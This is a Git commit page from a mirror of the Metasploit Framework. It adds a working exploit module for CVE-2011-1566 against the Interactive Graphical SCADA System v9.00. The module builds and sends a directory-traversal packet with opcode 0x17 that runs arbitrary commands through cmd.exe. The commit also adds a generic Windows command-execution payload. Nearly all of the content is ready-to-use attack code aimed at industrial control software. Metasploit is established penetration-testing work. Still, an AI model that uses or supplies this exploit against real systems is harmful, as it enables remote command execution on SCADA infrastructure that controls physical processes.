infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Support Windows CMD generic payload

bug/bundler_fix
jvazquez-r7 2013-10-17 14:07:27 -05:00
parent 955fc4e29e
commit be1d6ee0d3
3 changed files with 141 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
modules/auxiliary/admin/scada/igss_exec_17.rb
View File

@ -9,6 +9,10 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
require 'msf/core/module/deprecated'
include Msf::Module::Deprecated
deprecated Date.new(2013, 12, 17), 'exploit/windows/scada/igss_exec_17'
include Msf::Exploit::Remote::Tcp
def initialize(info = {})

80
modules/exploits/windows/scada/igss_exec_17.rb Normal file
View File

@ -0,0 +1,80 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Interactive Graphical SCADA System Remote Command Injection',
'Description' => %q{
This module abuses a directory traversal flaw in Interactive
Graphical SCADA System v9.00. In conjunction with the traversal
flaw, if opcode 0x17 is sent to the dc.exe process, an attacker
may be able to execute arbitrary system commands.
},
'Author' =>
[
'Luigi Auriemma',
'MC'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-1566'],
[ 'OSVDB', '72349'],
[ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],
],
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 153,
'DisableNops' => true
},
'Targets' =>
[
[ 'Windows', {} ]
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Mar 21 2011'))
register_options(
[
Opt::RPORT(12397)
], self.class)
end
def exploit
print_status("Sending exploit packet...")
connect
packet = [0x00000100].pack('V') + [0x00000000].pack('V')
packet << [0x00000100].pack('V') + [0x00000017].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V')
packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
packet << "windows\\system32\\cmd.exe\" /c #{payload.encoded}"
packet << "\x00" * (143) #
sock.put(packet)
sock.get_once(-1,0.5)
disconnect
end
end

57
modules/payloads/singles/cmd/windows/generic.rb Normal file
View File

@ -0,0 +1,57 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/find_shell'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows Command, Generic Command Execution',
'Description' => 'Executes the supplied command',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::None,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
register_options(
[
OptString.new('CMD', [ true, "The command string to execute" ]),
], self.class)
end
#
# Constructs the payload
#
def generate
return super + command_string
end
#
# Returns the command string to use for execution
#
def command_string
return datastore['CMD'] || ''
end
end